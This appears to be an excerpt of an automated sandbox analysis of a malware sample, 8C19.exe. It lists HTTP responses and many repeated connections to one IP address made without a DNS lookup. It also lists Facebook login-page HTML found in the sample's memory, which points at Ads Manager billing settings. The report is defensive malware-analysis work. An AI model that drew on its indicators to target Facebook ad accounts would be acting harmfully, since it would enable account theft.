2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 61 76 74 6c 73 67 6f 73 65 63 75 72 65 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at avtlsgosecure.com Port 80</address></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not Founddate: Mon, 17 Oct 2022 20:07:26 GMTserver: Apache/2.4.41 (Ubuntu)content-length: 69content-type: text/html; charset=utf-8Data Raw: 00 00 25 53 10 60 4e 7f dc 68 ea 26 57 51 ec bb f1 59 03 5e ba 87 aa e3 f8 17 5a f3 c5 64 e6 bb 3c 30 c8 bf a0 fa 14 ba aa 92 89 7a a6 72 8f 96 32 31 c8 7b 5f a7 1e 36 93 97 97 2b dc fb 14 82 b6 ca c1 3e f1 Data Ascii: %S`Nh&WQY^Zd<0zr21{_6+>

Source: unknown	TCP traffic detected without corresponding DNS query: 185.174.137.174
Source: unknown	TCP traffic detected without corresponding DNS query: 185.174.137.174
Source: unknown	TCP traffic detected without corresponding DNS query: 185.174.137.174
Source: unknown	TCP traffic detected without corresponding DNS query: 185.174.137.174
Source: unknown	TCP traffic detected without corresponding DNS query: 185.174.137.174
Source: unknown	TCP traffic detected without corresponding DNS query: 185.174.137.174
Source: unknown	TCP traffic detected without corresponding DNS query: 185.174.137.174
Source: unknown	TCP traffic detected without corresponding DNS query: 185.174.137.174
Source: unknown	TCP traffic detected without corresponding DNS query: 185.174.137.174
Source: unknown	TCP traffic detected without corresponding DNS query: 185.174.137.174
Source: unknown	TCP traffic detected without corresponding DNS query: 185.174.137.174
Source: unknown	TCP traffic detected without corresponding DNS query: 185.174.137.174
Source: unknown	TCP traffic detected without corresponding DNS query: 185.174.137.174
Source: unknown	TCP traffic detected without corresponding DNS query: 185.174.137.174
Source: unknown	TCP traffic detected without corresponding DNS query: 185.174.137.174
Source: unknown	TCP traffic detected without corresponding DNS query: 185.174.137.174
Source: unknown	TCP traffic detected without corresponding DNS query: 185.174.137.174
Source: unknown	TCP traffic detected without corresponding DNS query: 185.174.137.174
Source: unknown	TCP traffic detected without corresponding DNS query: 185.174.137.174
Source: unknown	TCP traffic detected without corresponding DNS query: 185.174.137.174
Source: unknown	TCP traffic detected without corresponding DNS query: 185.174.137.174
Source: unknown	TCP traffic detected without corresponding DNS query: 185.174.137.174
Source: unknown	TCP traffic detected without corresponding DNS query: 185.174.137.174
Source: unknown	TCP traffic detected without corresponding DNS query: 185.174.137.174
Source: unknown	TCP traffic detected without corresponding DNS query: 185.174.137.174
Source: unknown	TCP traffic detected without corresponding DNS query: 185.174.137.174
Source: unknown	TCP traffic detected without corresponding DNS query: 185.174.137.174
Source: unknown	TCP traffic detected without corresponding DNS query: 185.174.137.174
Source: unknown	TCP traffic detected without corresponding DNS query: 185.174.137.174
Source: unknown	TCP traffic detected without corresponding DNS query: 185.174.137.174
Source: unknown	TCP traffic detected without corresponding DNS query: 185.174.137.174
Source: unknown	TCP traffic detected without corresponding DNS query: 185.174.137.174
Source: unknown	TCP traffic detected without corresponding DNS query: 185.174.137.174
Source: unknown	TCP traffic detected without corresponding DNS query: 185.174.137.174
Source: unknown	TCP traffic detected without corresponding DNS query: 185.174.137.174
Source: unknown	TCP traffic detected without corresponding DNS query: 185.174.137.174
Source: unknown	TCP traffic detected without corresponding DNS query: 185.174.137.174
Source: unknown	TCP traffic detected without corresponding DNS query: 185.174.137.174
Source: unknown	TCP traffic detected without corresponding DNS query: 185.174.137.174
Source: unknown	TCP traffic detected without corresponding DNS query: 185.174.137.174
Source: unknown	TCP traffic detected without corresponding DNS query: 185.174.137.174
Source: unknown	TCP traffic detected without corresponding DNS query: 185.174.137.174
Source: unknown	TCP traffic detected without corresponding DNS query: 185.174.137.174
Source: unknown	TCP traffic detected without corresponding DNS query: 185.174.137.174
Source: unknown	TCP traffic detected without corresponding DNS query: 185.174.137.174
Source: unknown	TCP traffic detected without corresponding DNS query: 185.174.137.174
Source: unknown	TCP traffic detected without corresponding DNS query: 185.174.137.174
Source: unknown	TCP traffic detected without corresponding DNS query: 185.174.137.174
Source: unknown	TCP traffic detected without corresponding DNS query: 185.174.137.174
Source: unknown	TCP traffic detected without corresponding DNS query: 185.174.137.174

Source: 8C19.exe, 0000000A.00000003.546733790.00000000023EF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: </span><a href="/r.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing&amp;locale=en_US&amp;display=page" rel="nofollow" class="_97w5">Sign up for Facebook</a></div></div><input type="hidden" autocomplete="off" id="prefill_contact_point" name="prefill_contact_point" value="" /><input type="hidden" autocomplete="off" id="prefill_source" name="prefill_source" /><input type="hidden" autocomplete="off" id="prefill_type" name="prefill_type" /><input type="hidden" autocomplete="off" id="first_prefill_source" name="first_prefill_source" /><input type="hidden" autocomplete="off" id="first_prefill_type" name="first_prefill_type" /><input type="hidden" autocomplete="off" id="had_cp_prefilled" name="had_cp_prefilled" value="false" /><input type="hidden" autocomplete="off" id="had_password_prefilled" name="had_password_prefilled" value="false" /><input type="hidden" autocomplete="off" name="ab_test_data" value="" /></form><script nonce="BgTs8qFM">window.ge||(window.ge=function(a){return document.getElementById(a)});window.onload=function(a){return function(){var b=ge("email"),c=ge("pass");try{b&&!b.value?b.focus():c&&c.focus()}catch(a){if(!(a.number==-2146826178))throw a}return a&&a.call(window)}}(window.onload);function pop(a){window.open(a)}function reload_on_new_cookie(a){function b(a){a=new RegExp(a+"=(.*?)(;|$)");return a.test(document.cookie)?RegExp.$1:null}b("c_user")&&!window.__cancelCookieReload&&(window.clearInterval(window.__cookieReload),window.location=a)}function begin_polling_login_cookies(a){window.__cookieReload=window.setInterval(function(){reload_on_new_cookie(a)},5e3),window.__cancelCookieReload=!1,window.addEventListener("beforeunload",function(){window.__cancelCookieReload=!0})}</script></div></div></div></div><div class=""><div class="_95ke _8opy"><div id="pageFooter" data-referrer="page_footer" data-testid="page_footer"><ul class="uiList localeSelectorList _2pid _509- _4ki _6-h _6-j _6-i" data-nocookies="1"><li>English (US)</li><li><a class="_sv4" dir="ltr" href="https://de-de.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing" onclick="require(&quot;IntlUtils&quot;).setCookieLocale(&quot;de_DE&quot;, &quot;en_US&quot;, &quot;https:\/\/de-de.facebook.com\/login.php?next=https\u00253A\u00252F\u00252Fwww.facebook.com\u00252Fads\u00252Fmanager\u00252Faccount_settings\u00252Faccount_billing&quot;, &quot;www_list_selector&quot;, 0); return false;" title="German">Deutsch</a></li><li><a class="_sv4" dir="ltr" href="https://fr-fr.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing" onclick="require(&quot;IntlUtils&quot;).setCookieLocale(&quot;fr_FR&quot;, &quot;en_US&quot;, &quot;https:\/\/fr-fr.facebook.com\/login.php?next=https\u00253A\u00252F\u00252Fwww.facebook.com\u00252Fads\u00252Fmanager\u00252Faccount_settings\u00252Faccount_billing&quot;, &quot;www_list_selector&quot;, 1);
Source: 8C19.exe, 0000000A.00000003.531748027.0000000000646000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: </span><a href="/r.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing&amp;locale=en_US&amp;display=page" rel="nofollow" class="_97w5">Sign up for Facebook</a></div></div><input type="hidden" autocomplete="off" id="prefill_contact_point" name="prefill_contact_point" value="" /><input type="hidden" autocomplete="off" id="prefill_source" name="prefill_source" /><input type="hidden" autocomplete="off" id="prefill_type" name="prefill_type" /><input type="hidden" autocomplete="off" id="first_prefill_source" name="first_prefill_source" /><input type="hidden" autocomplete="off" id="first_prefill_type" name="first_prefill_type" /><input type="hidden" autocomplete="off" id="had_cp_prefilled" name="had_cp_prefilled" value="false" /><input type="hidden" autocomplete="off" id="had_password_prefilled" name="had_password_prefilled" value="false" /><input type="hidden" autocomplete="off" name="ab_test_data" value="" /></form><script nonce="xFgijA3d">window.ge||(window.ge=function(a){return document.getElementById(a)});window.onload=function(a){return function(){var b=ge("email"),c=ge("pass");try{b&&!b.value?b.focus():c&&c.focus()}catch(a){if(!(a.number==-2146826178))throw a}return a&&a.call(window)}}(window.onload);function pop(a){window.open(a)}function reload_on_new_cookie(a){function b(a){a=new RegExp(a+"=(.*?)(;|$)");return a.test(document.cookie)?RegExp.$1:null}b("c_user")&&!window.__cancelCookieReload&&(window.clearInterval(window.__cookieReload),window.location=a)}function begin_polling_login_cookies(a){window.__cookieReload=window.setInterval(function(){reload_on_new_cookie(a)},5e3),window.__cancelCookieReload=!1,window.addEventListener("beforeunload",function(){window.__cancelCookieReload=!0})}</script></div></div></div></div><div class=""><div class="_95ke _8opy"><div id="pageFooter" data-referrer="page_footer" data-testid="page_footer"><ul class="uiList localeSelectorList _2pid _509- _4ki _6-h _6-j _6-i" data-nocookies="1"><li>English (US)</li><li><a class="_sv4" dir="ltr" href="https://de-de.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing" onclick="require(&quot;IntlUtils&quot;).setCookieLocale(&quot;de_DE&quot;, &quot;en_US&quot;, &quot;https:\/\/de-de.facebook.com\/login.php?next=https\u00253A\u00252F\u00252Fwww.facebook.com\u00252Fads\u00252Fmanager\u00252Faccount_settings\u00252Faccount_billing&quot;, &quot;www_list_selector&quot;, 0); return false;" title="German">Deutsch</a></li><li><a class="_sv4" dir="ltr" href="https://fr-fr.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing" onclick="require(&quot;IntlUtils&quot;).setCookieLocale(&quot;fr_FR&quot;, &quot;en_US&quot;, &quot;https:\/\/fr-fr.facebook.com\/login.php?next=https\u00253A\u00252F\u00252Fwww.facebook.com\u00252Fads\u00252Fmanager\u00252Faccount_settings\u00252Faccount_billing&quot;, &quot;www_list_selector&quot;, 1);
Source: 8C19.exe, 0000000A.00000003.535904111.00000000023A9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: ",fds:60,fda:60,i:60,sbs:1,dbs:100,bbs:100,hbi:60,rt:262144,hbcbc:2,hbvbc:0,hbbi:30,sid:-1,hbv:"6053591329617399234"}]],["NavigationMetrics","setPage",[],[{page:"XWebLoginController",page_type:"normal",page_uri:"https://www.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing",serverLID:"7155575378678572287"}]],["FalcoLoggerTransports","attach",[],[]],["Chromedome","start",[],[{}]],["NavigationClickPointHandler"],["ServiceWorkerURLCleaner","removeRedirectID",[],[]],["WebDevicePerfInfoLogging","doLog",[],[]],["WebStorageMonster","schedule",[],[]],["Artillery","disable",[],[]],["ScriptPathLogger","startLogging",[],[]],["TimeSpentBitArrayLogger","init",[],[]],["DeferredCookie","addToQueue",[],["_js_datr","5bVNY4FmIh2T_pp8TKyvzxjP",63072000000,"/",true,false,true]],["DeferredCookie","addToQueue",[],["_js_sb","5bVNY_SvyCxTGzDctobklTe8",63072000000,"/",false,false,true]],["ClickRefLogger"],["DetectBrokenProxyCache","run",[],[0,"c_user"]]]},hsrp:{hsdp:{clpData:{"1743095":{r:1,s:1},"1871697":{r:1,s:1},"1829319":{r:1},"1829320":{r:1},"1843988":{r:1}},gkxData:{"1652843":{result:false,hash:"AT6uh9NWRY4QEQoY5aY"}}},hblp:{consistency:{rev:1006402711},rsrcMap:{zPYlTyl:{type:"js",src:"https://static.xx.fbcdn.net/rsrc.php/v3/yO/r/pslzeMSEB_a.js?_nc_x=Ij3Wp8lg5Kz"},wL2J9cL:{type:"js",src:"https://static.xx.fbcdn.net/rsrc.php/v3/yH/r/xXDOO3oMCfl.js?_nc_x=Ij3Wp8lg5Kz"}},compMap:{TransportSelectingClientSingleton:{r:["z9xmXAe","owesA3P"]$4{+ equals www.facebook.com (Facebook)
Source: 8C19.exe, 0000000A.00000003.535730121.000000000238E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: #star-mini.c10r.facebook.comwww.facebook.com equals www.facebook.com (Facebook)
Source: 8C19.exe, 0000000A.00000003.535094361.00000000023BB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: #star-mini.c10r.facebook.comwww.facebook.comf; equals www.facebook.com (Facebook)
Source: 8C19.exe, 0000000A.00000003.535730121.000000000238E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: #star-mini.c10r.facebook.comwww.facebook.comwP equals www.facebook.com (Facebook)
Source: 8C19.exe, 0000000A.00000003.531748027.0000000000646000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: )</a></li><li><a role="button" class="_42ft _4jy0 _517i _517h _51sy" rel="dialog" ajaxify="/settings/language/language/?uri=https%3A%2F%2Fzh-cn.facebook.com%2Flogin.php%3Fnext%3Dhttps%253A%252F%252Fwww.facebook.com%252Fads%252Fmanager%252Faccount_settings%252Faccount_billing&amp;source=www_list_selector_more" href="#" title="Show more languages"><i class="img sp_DCIoZ9fhhuS sx_1132bf"></i></a></li></ul><div id="contentCurve"></div><div id="pageFooterChildren" role="contentinfo" aria-label="Facebook site links"><ul class="uiList pageFooterLinkList _509- _4ki _703 _6-i"><li><a href="/reg/" title="Sign Up for Facebook">Sign Up</a></li><li><a href="/login/" title="Log into Facebook">Log In</a></li><li><a href="https://messenger.com/" title="Check out Messenger.">Messenger</a></li><li><a href="/lite/" title="Facebook Lite for Android.">Facebook Lite</a></li><li><a href="https://www.facebook.com/watch/" title="Browse our Watch videos.">Watch</a></li><li><a href="/places/" title="Check out popular places on Facebook.">Places</a></li><li><a href="/games/" title="Check out Facebook games.">Games</a></li><li><a href="/marketplace/" title="Buy and sell on Facebook Marketplace.">Marketplace</a></li><li><a href="https://pay.facebook.com/" title="Learn more about Meta Pay" target="_blank">Meta Pay</a></li><li><a href="https://www.oculus.com/" title="Learn more about Oculus" target="_blank">Oculus</a></li><li><a href="https://portal.facebook.com/" title="Learn more about Facebook Portal" target="_blank">Portal</a></li><li><a href="https://l.facebook.com/l.php?u=https%3A%2F%2Fwww.instagram.com%2F&amp;h=AT3HdDjBfS7-3o9IYFj_aingMK21knT70XfMS-Qns1SqBdBCTMbSUAQ9KJproUzBZjUfoboZ5pSE7BHD8TXKrOzC3c6CsCVCPjDn_R3w2ael58Y0Cwyi4ENPKG1IdxUvLuLSDElTK9u4CQTUkgycjA" title="Check out Instagram" target="_blank" rel="noopener nofollow" data-lynx-mode="asynclazy">Instagram</a></li><li><a href="https://www.bulletin.com/" title="Check out Bulletin Newsletter">Bulletin</a></li><li><a href="/local/lists/245019872666104/" title="Browse our Local Lists directory.">Local</a></li><li><a href="/fundraisers/" title="Donate to worthy causes.">Fundraisers</a></li><li><a href="/biz/directory/" title="Browse our Facebook Services directory.">Services</a></li><li><a href="/votinginformationcenter/?entry_point=c2l0ZQ%3D%3D" title="See the Voting Information Center.">Voting Information Center</a></li><li><a href="/groups/explore/" title="Explore our Groups.">Groups</a></li><li><a href="https://about.facebook.com/" accesskey="8" title="Read our blog, discover the resource center, and find job opportunities.">About</a></li><li><a href="/ad_campaign/landing.php?placement=pflo&amp;campaign_id=402047449186&amp;nav_source=unknown&amp;extra_1=auto" title="Advertise on Facebook.">Create Ad</a></li><li><a href="/pages/create/?ref_type=site_footer" title="Create a page">Create Page</a></li><li><a href="https://developers.facebook.com/?ref=pf" title="Develop on our platform.">Developers</a></li><li><a href="
Source: 8C19.exe, 0000000A.00000003.546733790.00000000023EF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: )</a></li><li><a role="button" class="_42ft _4jy0 _517i _517h _51sy" rel="dialog" ajaxify="/settings/language/language/?uri=https%3A%2F%2Fzh-cn.facebook.com%2Flogin.php%3Fnext%3Dhttps%253A%252F%252Fwww.facebook.com%252Fads%252Fmanager%252Faccount_settings%252Faccount_billing&amp;source=www_list_selector_more" href="#" title="Show more languages"><i class="img sp_DCIoZ9fhhuS sx_1132bf"></i></a></li></ul><div id="contentCurve"></div><div id="pageFooterChildren" role="contentinfo" aria-label="Facebook site links"><ul class="uiList pageFooterLinkList _509- _4ki _703 _6-i"><li><a href="/reg/" title="Sign Up for Facebook">Sign Up</a></li><li><a href="/login/" title="Log into Facebook">Log In</a></li><li><a href="https://messenger.com/" title="Check out Messenger.">Messenger</a></li><li><a href="/lite/" title="Facebook Lite for Android.">Facebook Lite</a></li><li><a href="https://www.facebook.com/watch/" title="Browse our Watch videos.">Watch</a></li><li><a href="/places/" title="Check out popular places on Facebook.">Places</a></li><li><a href="/games/" title="Check out Facebook games.">Games</a></li><li><a href="/marketplace/" title="Buy and sell on Facebook Marketplace.">Marketplace</a></li><li><a href="https://pay.facebook.com/" title="Learn more about Meta Pay" target="_blank">Meta Pay</a></li><li><a href="https://www.oculus.com/" title="Learn more about Oculus" target="_blank">Oculus</a></li><li><a href="https://portal.facebook.com/" title="Learn more about Facebook Portal" target="_blank">Portal</a></li><li><a href="https://l.facebook.com/l.php?u=https%3A%2F%2Fwww.instagram.com%2F&amp;h=AT3bs_3b3oropaiNizHihK1qoACXlhGwpb-zbShway7vBhu84U5eApA7CSereXftDmS6VkD2IT5gJ-7fU0IWQFRdA3AxCPxra__gax5cQ2w7i7qEBYYPBx110CkNlZ-BWi6Xk2kNxWErd2iyL2HaHg" title="Check out Instagram" target="_blank" rel="noopener nofollow" data-lynx-mode="asynclazy">Instagram</a></li><li><a href="https://www.bulletin.com/" title="Check out Bulletin Newsletter">Bulletin</a></li><li><a href="/local/lists/245019872666104/" title="Browse our Local Lists directory.">Local</a></li><li><a href="/fundraisers/" title="Donate to worthy causes.">Fundraisers</a></li><li><a href="/biz/directory/" title="Browse our Facebook Services directory.">Services</a></li><li><a href="/votinginformationcenter/?entry_point=c2l0ZQ%3D%3D" title="See the Voting Information Center.">Voting Information Center</a></li><li><a href="/groups/explore/" title="Explore our Groups.">Groups</a></li><li><a href="https://about.facebook.com/" accesskey="8" title="Read our blog, discover the resource center, and find job opportunities.">About</a></li><li><a href="/ad_campaign/landing.php?placement=pflo&amp;campaign_id=402047449186&amp;nav_source=unknown&amp;extra_1=auto" title="Advertise on Facebook.">Create Ad</a></li><li><a href="/pages/create/?ref_type=site_footer" title="Create a page">Create Page</a></li><li><a href="https://developers.facebook.com/?ref=pf" title="Develop on our platform.">Developers</a></li><li><a href="
Source: 8C19.exe, 0000000A.00000003.534860765.00000000005EF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: .facebook.com wss://edge-chat.facebook.com wss://snaptu-d.facebook.com wss://kaios-d.facebook.com/ *.fbsbx.com;font-src data: *.facebook.com *.fbcdn.net *.fbsbx.com;img-src *.fbcdn.net *.facebook.com data: https://*.fbsbx.com facebook.com *.cdninstagram.com fbsbx.com fbcdn.net blob: android-webview-video-poster: *.oculuscdn.com;media-src *.cdninstagram.com blob: *.fbcdn.net *.fbsbx.com www.facebook.com *.facebook.com data:;frame-src *.facebook.com *.fbsbx.com fbsbx.com data: *.fbcdn.net;worker-src blob: *.facebook.com data:;block-all-mixed-content;upgrade-insecure-requests;report-uri https://www.facebook.com/csp/reporting/?m=c&minimize=0; equals www.facebook.com (Facebook)
Source: 8C19.exe, 0000000A.00000003.533047658.000000000239E000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.535847326.000000000239E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: /login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing equals www.facebook.com (Facebook)
Source: 8C19.exe, 0000000A.00000003.546733790.00000000023EF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: </a></li><li><a class="_sv4" dir="ltr" href="https://hi-in.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing" onclick="require(&quot;IntlUtils&quot;).setCookieLocale(&quot;hi_IN&quot;, &quot;en_US&quot;, &quot;https:\/\/hi-in.facebook.com\/login.php?next=https\u00253A\u00252F\u00252Fwww.facebook.com\u00252Fads\u00252Fmanager\u00252Faccount_settings\u00252Faccount_billing&quot;, &quot;www_list_selector&quot;, 8); return false;" title="Hindi"> equals www.facebook.com (Facebook)
Source: 8C19.exe, 0000000A.00000003.546733790.00000000023EF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: </a></li><li><a class="_sv4" dir="ltr" href="https://zh-cn.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing" onclick="require(&quot;IntlUtils&quot;).setCookieLocale(&quot;zh_CN&quot;, &quot;en_US&quot;, &quot;https:\/\/zh-cn.facebook.com\/login.php?next=https\u00253A\u00252F\u00252Fwww.facebook.com\u00252Fads\u00252Fmanager\u00252Faccount_settings\u00252Faccount_billing&quot;, &quot;www_list_selector&quot;, 9); return false;" title="Simplified Chinese (China)"> equals www.facebook.com (Facebook)
Source: 8C19.exe, 0000000A.00000003.547702633.00000000005F0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: <head><meta charset="utf-8" /><meta name="referrer" content="origin-when-crossorigin" id="meta_referrer" /><script nonce="BgTs8qFM">function envFlush(a){function b(b){for(var c in a)b[c]=a[c]}window.requireLazy?window.requireLazy(["Env"],b):(window.Env=window.Env||{},b(window.Env))}envFlush({"ajaxpipe_token":"AXjm4PeMFcokJAYJzO4","gk_instrument_object_url":true,"stack_trace_limit":30,"timesliceBufferSize":5000,"show_invariant_decoder":false,"compat_iframe_token":"AQ5dnxsGFAxPR8-bejQ","isCQuick":false});</script><script nonce="BgTs8qFM">(function(a){function b(b){if(!window.openDatabase)return;b.I_AM_INCOGNITO_AND_I_REALLY_NEED_WEBSQL=function(a,b,c,d){return window.openDatabase(a,b,c,d)};window.openDatabase=function(){throw new Error()}}b(a)})(this);</script><style nonce="BgTs8qFM"></style><script nonce="BgTs8qFM">__DEV__=0;CavalryLogger=false;</script><noscript><meta http-equiv="refresh" content="0; URL=/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Facc equals www.facebook.com (Facebook)
Source: 8C19.exe, 0000000A.00000003.547903273.00000000023D2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: <head><meta charset="utf-8" /><meta name="referrer" content="origin-when-crossorigin" id="meta_referrer" /><script nonce="BgTs8qFM">function envFlush(a){function b(b){for(var c in a)b[c]=a[c]}window.requireLazy?window.requireLazy(["Env"],b):(window.Env=window.Env||{},b(window.Env))}envFlush({"ajaxpipe_token":"AXjm4PeMFcokJAYJzO4","gk_instrument_object_url":true,"stack_trace_limit":30,"timesliceBufferSize":5000,"show_invariant_decoder":false,"compat_iframe_token":"AQ5dnxsGFAxPR8-bejQ","isCQuick":false});</script><script nonce="BgTs8qFM">(function(a){function b(b){if(!window.openDatabase)return;b.I_AM_INCOGNITO_AND_I_REALLY_NEED_WEBSQL=function(a,b,c,d){return window.openDatabase(a,b,c,d)};window.openDatabase=function(){throw new Error()}}b(a)})(this);</script><style nonce="BgTs8qFM"></style><script nonce="BgTs8qFM">__DEV__=0;CavalryLogger=false;</script><noscript><meta http-equiv="refresh" content="0; URL=/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing&amp;_fb_noscript=1" /></noscript><link rel="manifest" id="MANIFEST_LINK" href="/data/manifest/" crossorigin="use-credentials" /><title id="pageTitle">Log into Facebook</title><meta name="description" content="Log into Facebook to start sharing and connecting with your friends, family, and people you know." /><meta property="og:site_name" content="Facebook" /><meta property="og:url" content="https://www.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing" / equals www.facebook.com (Facebook)
Source: 8C19.exe, 0000000A.00000003.546733790.00000000023EF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: <head><meta charset="utf-8" /><meta name="referrer" content="origin-when-crossorigin" id="meta_referrer" /><script nonce="BgTs8qFM">function envFlush(a){function b(b){for(var c in a)b[c]=a[c]}window.requireLazy?window.requireLazy(["Env"],b):(window.Env=window.Env||{},b(window.Env))}envFlush({"ajaxpipe_token":"AXjm4PeMFcokJAYJzO4","gk_instrument_object_url":true,"stack_trace_limit":30,"timesliceBufferSize":5000,"show_invariant_decoder":false,"compat_iframe_token":"AQ5dnxsGFAxPR8-bejQ","isCQuick":false});</script><script nonce="BgTs8qFM">(function(a){function b(b){if(!window.openDatabase)return;b.I_AM_INCOGNITO_AND_I_REALLY_NEED_WEBSQL=function(a,b,c,d){return window.openDatabase(a,b,c,d)};window.openDatabase=function(){throw new Error()}}b(a)})(this);</script><style nonce="BgTs8qFM"></style><script nonce="BgTs8qFM">__DEV__=0;CavalryLogger=false;</script><noscript><meta http-equiv="refresh" content="0; URL=/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing&amp;_fb_noscript=1" /></noscript><link rel="manifest" id="MANIFEST_LINK" href="/data/manifest/" crossorigin="use-credentials" /><title id="pageTitle">Log into Facebook</title><meta name="description" content="Log into Facebook to start sharing and connecting with your friends, family, and people you know." /><meta property="og:site_name" content="Facebook" /><meta property="og:url" content="https://www.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing" /><meta property="og:locale" content="en_US" /><link rel="canonical" href="https://www.facebook.com/login/web/" /><link rel="shortcut icon" href="https://static.xx.fbcdn.net/rsrc.php/yb/r/hLRJ1GG_y0J.ico" /><link type="text/css" rel="stylesheet" href="https://static.xx.fbcdn.net/rsrc.php/v3/yG/l/0,cross/ZVO5s7NaGvm.css?_nc_x=Ij3Wp8lg5Kz" data-bootloader-hash="Z6KNn4Q" crossorigin="anonymous" /> equals www.facebook.com (Facebook)
Source: 8C19.exe, 0000000A.00000003.537958292.00000000023A9000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.535904111.00000000023A9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: <head><meta charset="utf-8" /><meta name="referrer" content="origin-when-crossorigin" id="meta_referrer" /><script nonce="xFgijA3d">function envFlush(a){function b(b){for(var c in a)b[c]=a[c]}window.requireLazy?window.requireLazy(["Env"],b):(window.Env=window.Env||{},b(window.Env))}envFlush({"ajaxpipe_token":"AXjm4PeMFcokJAYJjS0","gk_instrument_object_url":true,"stack_trace_limit":30,"timesliceBufferSize":5000,"show_invariant_decoder":false,"compat_iframe_token":"AQ5dnxsGFAxPR8-bcdI","isCQuick":false});</script><script nonce="xFgijA3d">(function(a){function b(b){if(!window.openDatabase)return;b.I_AM_INCOGNITO_AND_I_REALLY_NEED_WEBSQL=function(a,b,c,d){return window.openDatabase(a,b,c,d)};window.openDatabase=function(){throw new Error()}}b(a)})(this);</script><style nonce="xFgijA3d"></style><script nonce="xFgijA3d">__DEV__=0;CavalryLogger=false;</script><noscript><meta http-equiv="refresh" content="0; URL=/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing&amp;_fb_noscript=1" /></noscript><link rel="manifest" id="MANIFEST_LINK" href="/dat equals www.facebook.com (Facebook)
Source: 8C19.exe, 0000000A.00000003.531748027.0000000000646000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: <head><meta charset="utf-8" /><meta name="referrer" content="origin-when-crossorigin" id="meta_referrer" /><script nonce="xFgijA3d">function envFlush(a){function b(b){for(var c in a)b[c]=a[c]}window.requireLazy?window.requireLazy(["Env"],b):(window.Env=window.Env||{},b(window.Env))}envFlush({"ajaxpipe_token":"AXjm4PeMFcokJAYJjS0","gk_instrument_object_url":true,"stack_trace_limit":30,"timesliceBufferSize":5000,"show_invariant_decoder":false,"compat_iframe_token":"AQ5dnxsGFAxPR8-bcdI","isCQuick":false});</script><script nonce="xFgijA3d">(function(a){function b(b){if(!window.openDatabase)return;b.I_AM_INCOGNITO_AND_I_REALLY_NEED_WEBSQL=function(a,b,c,d){return window.openDatabase(a,b,c,d)};window.openDatabase=function(){throw new Error()}}b(a)})(this);</script><style nonce="xFgijA3d"></style><script nonce="xFgijA3d">__DEV__=0;CavalryLogger=false;</script><noscript><meta http-equiv="refresh" content="0; URL=/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing&amp;_fb_noscript=1" /></noscript><link rel="manifest" id="MANIFEST_LINK" href="/data/manifest/" crossorigin="use-credentials" /><title id="pageTitle">Log into Facebook</title><meta name="description" content="Log into Facebook to start sharing and connecting with your friends, family, and people you know." /><meta property="og:site_name" content="Facebook" /><meta property="og:url" content="https://www.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing" /><meta property="og:locale" content="en_US" /><link rel="canonical" href="https://www.facebook.com/login/web/" /><link 